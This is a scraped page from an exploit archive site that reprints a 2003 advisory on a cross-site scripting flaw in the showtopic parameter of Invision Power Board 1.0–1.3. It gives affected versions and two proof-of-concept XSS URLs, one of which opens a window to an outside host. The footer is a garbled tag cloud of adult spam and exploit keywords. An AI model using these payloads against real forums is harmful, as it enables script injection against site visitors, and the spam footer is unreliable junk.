about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Invision Power Board Index.php Showtopic Cross-Site Scripting Vulnerability


Title Invision Power Board Index.php Showtopic Cross-Site Scripting Vulnerability
Published 2003-09-09-12:00AM
Updated 2004-03-01-03:46PM
Class Input Validation Error
CVE   CVE-MAP-NOMATCH
Remote  Yes
Local  No
Credit  The disclosure of this issue has been credited to Boy Bear <eyal067@walla.co.il>.
Vulnerable  Invision Power Services Invision Board 1.3 Final
Invision Power Services Invision Board 1.3
Invision Power Services Invision Board 1.2
Invision Power Services Invision Board 1.1.2
Invision Power Services Invision Board 1.1.1
Invision Power Services Invision Board 1.0.1
Invision Power Services Invision Board 1.0
Not Vulnerable  
Code   The following proof of concept was provided:

http://www.example.com/index.php?showtopic='>&lt;script&gt;window.open
(window.location.search.substring(79))
&lt;/script&gt;http://binaryvision.tech.nu?BoyBear$$$From$$$BinaryVision
http://www.example.com/?showtopic='><script>alert(window.document.url)</script><plaintext>
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Mon, 30 Nov 2009 11:24:05 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
NBA Www simren wrldsex.co Indian aun CMS is Fre Girlsfucki exploits f dg.bestiis news for www.zhmf51 phpBB 2.0. ANGELA TAY Microsoft Www.girls4 port 38 Dog woman dy.114gd.c COLDFUSION 200 /compo Sexvedio.C php 4.4.5 bestiis.ne Sexwomen 200 /compo pornxxx Www.Adultf shop352703 we live to UW imapd arcade 2.5 hanter xha Fotossex news searc Remote Fil Fedora Cor www.pcbxy. f.i.l.t.e. openssh 3. Vad770 documents IPB v2.1. www.gpshy. www.pcbxy. Sexy movie www.cn-xin www.proxys 3.5.3 Crack Data t360t php-nuke 2